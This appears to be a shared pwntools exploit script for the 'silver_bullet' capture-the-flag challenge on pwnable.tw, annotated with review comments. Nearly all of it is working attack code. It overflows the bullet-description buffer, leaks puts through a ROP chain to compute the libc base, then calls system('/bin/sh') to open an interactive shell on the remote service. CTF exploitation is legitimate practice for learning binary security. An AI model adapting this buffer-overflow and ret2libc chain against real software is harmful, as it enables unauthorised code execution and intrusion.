finalshare

silver_bullet

  1. import sys
  2. from pwn import *
# Environment intended for the local target: preload the challenge's libc so
# the local process uses the same library the remote service ships with.
# NOTE(review): `env` is built but never passed to process() below (no
# env=env), so the local run links against the host libc and the offsets
# taken from `glibc` only line up with the remote target — confirm intent.
env = {
"LD_PRELOAD": "./libc_32.so.6"
}
# ELF view of the supplied libc; its symbol table is the source of every
# libc offset used later (puts, system, the "/bin/sh" string).
glibc=ELF("./libc_32.so.6")
# Python 2 print statement: this script targets Python 2 pwntools.
print glibc.symbols['system']
# 32-bit x86 target; debug logging dumps every byte sent and received.
context(os='linux', arch='i386', log_level='debug')
# Non-zero => attach gdb to the (local) process right after it starts.
GDB = 1
# Module-level placeholder; main() assigns its own local `base` and never
# declares `global base`, so this stays 0 (nothing reads it).
base=0
# Any command-line argument selects the remote service; no argument starts
# the binary locally with ASLR disabled.
if len(sys.argv) >1:
    r = remote("chall.pwnable.tw", 10103)
else:
    r = process("./silver_bullet",aslr=False)
# Breakpoint at a fixed text address of ./silver_bullet — what is there is
# not visible from this script. With a remote tube this attach does not
# apply to the challenge server.
if (GDB):
    gdb.attach(r,gdbscript='''
b* 0x08048A18
c
''')
def create(des):
    """Select menu option 1 and submit *des* as the bullet description.

    Waits for the description prompt before sending and for the
    "Good luck !!" acknowledgement afterwards, so the next interaction
    starts from a known point in the target's output. *des* is sent
    as-is (no trailing newline) on the module-level tube ``r``.
    """
    prompt = "Give me your description of bullet :"
    ack = "Good luck !!"
    io = r
    io.sendline("1")
    io.recvuntil(prompt)
    io.send(des)
    io.recvuntil(ack)
def powerup(des):
    """Select menu option 2 and submit *des* as the additional description.

    Mirrors create(): wait for the prompt, send *des* without a newline,
    then consume the "Enjoy it !" acknowledgement on the module-level
    tube ``r``.
    """
    prompt = "Give me your another description of bullet :"
    ack = "Enjoy it !"
    io = r
    io.sendline("2")
    io.recvuntil(prompt)
    io.send(des)
    io.recvuntil(ack)
def beat():
    """Select menu option 3 on the module-level tube ``r``.

    Nothing is read back here; the caller decides what output to wait for.
    """
    choice = "3"
    r.sendline(choice)
def main():
    """Run the two-round exchange against the target.

    Round 1 reads 4 bytes after the win message and treats them as the
    runtime address of libc's puts, from which the libc base is derived.
    Round 2 repeats the same sequence with the first and third dword of
    the payload replaced by the rebased system and "/bin/sh" addresses,
    then hands the tube to the user.

    Relies on the module-level tube ``r`` and libc ELF ``glibc``.
    """
    # Round 1: obtain a libc address.
    create(cyclic(47))

    powerup(cyclic(1))
    pos=7   # NOTE(review): unused, here and in round 2.
    # 7 filler bytes followed by three little-endian dwords. Their roles
    # follow from round 2, where the same slots hold system and the
    # "/bin/sh" address. 0x080484A8 / 0x0804AFDC are presumably the
    # binary's puts PLT and GOT entries (the 4 bytes read below are
    # interpreted as puts's address) — not verifiable from this script.
    # 0x080484F0 is kept unchanged in round 2; since the script continues
    # with a fresh create() afterwards, it presumably re-enters the
    # program — confirm against the binary.
    payload="A"*7
    payload+=p32(0x080484A8)
    payload+=p32(0x080484F0)
    payload+=p32(0x0804AFDC)
    powerup(payload)
    # Two option-3 rounds before the win message; why two is a property of
    # the target's menu loop, not visible here.
    beat()
    beat()
    r.recvuntil("Oh ! You win !!\n")
    puts=u32(r.recv(4))
    # Local `base` (shadows the module-level one). Setting glibc.address
    # rebases the ELF so symbols[...] and search(...) return runtime
    # addresses from here on.
    base=puts-glibc.symbols['puts']
    glibc.address=base

    log.success("BASE: "+hex(glibc.address))
    log.success("SYSTEM: "+hex(glibc.symbols["system"]))
    log.success("\\bin\\sh: "+hex(next(glibc.search('/bin/sh\x00'))))
    # Round 2: same sequence, slots 1 and 3 now filled from the rebased libc.
    create(cyclic(47))

    powerup(cyclic(1))
    pos=7
    payload="A"*7
    payload+=p32(glibc.symbols["system"])
    payload+=p32(0x080484F0)
    payload+=p32(next(glibc.search('/bin/sh\x00')))
    powerup(payload)
    beat()
    beat()
    # Hand the tube over to the user.
    r.interactive()
  64.  
# Only the two exchange rounds are deferred to main(); the tube (remote or
# local process) and the optional gdb attach are created at import time above.
if __name__ == "__main__":
    main()